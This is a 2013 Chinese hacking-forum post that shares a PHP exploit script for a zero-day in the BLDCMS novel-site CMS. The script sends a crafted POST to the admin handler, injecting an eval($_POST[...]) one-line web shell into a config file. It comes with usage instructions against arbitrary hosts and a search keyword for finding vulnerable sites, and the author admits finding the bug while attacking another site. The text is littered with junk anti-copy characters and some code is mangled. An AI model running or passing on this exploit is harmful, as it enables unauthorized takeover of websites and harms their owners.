中国网络渗透测试联盟

标题: BLDCMS(白老大小说) Getshell 0day EXP [打印本页]

作者: admin    时间: 2013-3-26 20:49
标题: BLDCMS(白老大小说) Getshell 0day EXP
之前想搞一个黑阔站 发现旁站有一个站用了BLDCMS 我就下载看了.. 找到了一个getshell漏洞
5 Y* z. W& h7 a3 f4 |' ]
0 I& ?" i1 W) T3 h, |  w % u: @/ s! [7 O& v
话说昨晚晴天小铸在90sec发现有人把这getshell漏洞的分析发出来了 擦 居然被人先发了   j, d+ u$ Z  }# K. f

; ~. u# ^7 C, e* o7 x. I* K既然都有人发了 我就把我之前写好的EXP放出来吧. G6 M' w) y; X/ |7 _8 E

1 q1 S  g/ q! ?2 Gview source print?01.php;">
& B, P8 l- [1 p. o$ z2 U3 t02.<!--?php. x$ t9 T6 z& P" r* T2 a) A
03.echo "-------------------------------------------------------------------0 j) e  a9 t# c! n' J0 G9 T
04.
6 q& W* G. w' a, s5 J05.------------\r\n              BLDCMS(白老大php小说小偷) GETSHELL 0DAY EXP
2 V4 K+ G. h1 B  h( Z* r0 Y06.
2 _7 L4 }" h) i7 E2 a07.(GPC=Off)\r\n            Vulnerability discovery&Code by 数据流@wooyun
, t1 O8 W, V; @# m; q- D08. , m/ ?- S. Z4 O6 @4 y3 x. O
09.QQ:981009941\r\n                                2013.3.21\r\n            
) T( P( R1 p4 S9 C; ]10. 7 o$ @; ~" e6 ^) Z+ F- y
11. : O7 H# J; n! d! g7 |4 B+ s
12.用法:php.exe EXP.php www.baidu.com /cms/ pass(一句话密码
" p9 D9 p* y, o8 }, z/ q13. , b  W% y4 z1 x0 ]* f; Q
14.)\r\n                    搜索关键字:\"开发者: 白老大小说\"\r\n-----------' D5 n' R& C- t' x% q
15.
7 ?: T6 Y# [8 S% R16.--------------------------------------------------------------------\r\n";
, ^3 `2 j7 D2 Z17.$url=$argv[1];! C+ [- w1 x. V( z
18.$dir=$argv[2];. L, @2 z6 ]# j6 T6 y1 o3 y" R
19.$pass=$argv[3];
( U; }; `# c/ E# C! l! ~20.$eval='\';eval($_POST['.'"'.$pass.'"'.']);\'';& @; Y! X" Z, c+ j; M6 T+ {
21.if (emptyempty($pass)||emptyempty($url))
, z; N0 [; n, ^6 B# {1 O, Q. n9 `22.{exit("请输入参数");}
- P$ }: }# E2 K8 _. s5 b23.else3 E2 x9 }; S: o
24.{
! Q8 ?) B5 d  D; G/ g25.$fuckdata='sitename=a&qq=1&getcontent=acurl&tongji=a&cmsmd5=1&sqlite='.$ev
4 W3 y% t. G' Q( N% D26. : R8 V% C* A1 @$ u9 P
27.al;
0 v' R$ C* I& S* R% o  Q28.$length = strlen($fuckdata);
3 u# A5 U+ t" ]9 o! d; u: B6 Z29.function getshell($url,$pass)
& Z" T3 O6 h7 P9 P$ J& w30.{* G0 ^* ]' L( N' j4 W# ^
31.global $url,$dir,$pass,$eval,$length,$fuckdata;, h; y  K( b0 g6 n. g% R
32.$header = "OST /admin/chuli.php?action=a_1 HTTP/1.1\r\n";; c& {( w  C7 I$ ~- ~. A
33.$header .= "Content-Type: application/x-www-form-urlencoded\r\n";: C0 h3 }1 ?0 p6 x; N
34.$header .= "User-Agent: MSIE\r\n";& t9 g5 \0 c6 o" k. T  q* n6 a
35.$header .= "Host:".$url."\r\n";
' `5 O- |% \$ R4 ~( {36.$header .= "Content-Length: ".$length."\r\n";
' x$ Z( n7 c" D37.$header .= "Connection: Close\r\n";
" p+ Q" V# E+ {38.$header .="\r\n";
) q: ?0 v; w, Y) \/ {. A39.$header .= $fuckdata."\r\n\r\n";
' @4 k$ q& y! @& i! `& e40.$fp = fsockopen($url, 80,$errno,$errstr,15);
) K* Q+ D) D, s- J41.if (!$fp)
5 x( n7 e' J0 O5 }# @9 e+ p+ t2 x42.{! c' Y) X5 @  q0 o, \0 D/ l
43.exit ("利用失败:请检查指定目标是否能正常打开");( Q' Q+ F: r% |" ?8 @; q% S
44.}4 Z" L& f/ u. }+ }, b
45.else{ if (!fputs($fp,$header))
3 N- J5 I; L  |3 O46.{exit ("利用失败");}
8 l% A  V' I' P7 n+ x6 g0 U: c2 k47.else
. S1 r1 T9 i3 l" V( \1 k1 q4 O48.{
9 d3 w0 a2 K) c4 C1 f49.$receive = '';
$ B1 s0 A+ J9 Y" f2 j" Q# h50.while (!feof($fp)) {
$ l# ~! U+ M% u' C8 G. k, ~51.$receive .= @fgets($fp, 1000);
6 h! L8 B  A/ f52.}: |% L) ?  C+ S2 A2 `
53.@fclose($fp);- H' u$ A: D3 w' r7 F7 Q
54.echo "$url/$dir/conn/config/normal2.php passpass(如连接失败 请检查目标
. B; Z. C3 ?9 V! @. J55. 8 q1 h/ M0 K/ C! ^% r- W2 g
56.GPC是否=off)";
6 ~" e! S4 M" _  K57.}}
4 w2 g& _6 L+ F* ~- e3 n58.}& E) o, X7 `; s
59.}
7 p. q4 n: F5 {8 H60.getshell($url,$pass);( \0 k$ t) @/ c
61.?-->" F+ K9 |) |3 ]$ n
+ D6 k7 O& e* O8 B7 i: S: z3 F
# O7 `9 U# k! @; M
; p& V% E5 W  T# U. a' e
by 数据流
  ^2 a  m0 C& P/ Q




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2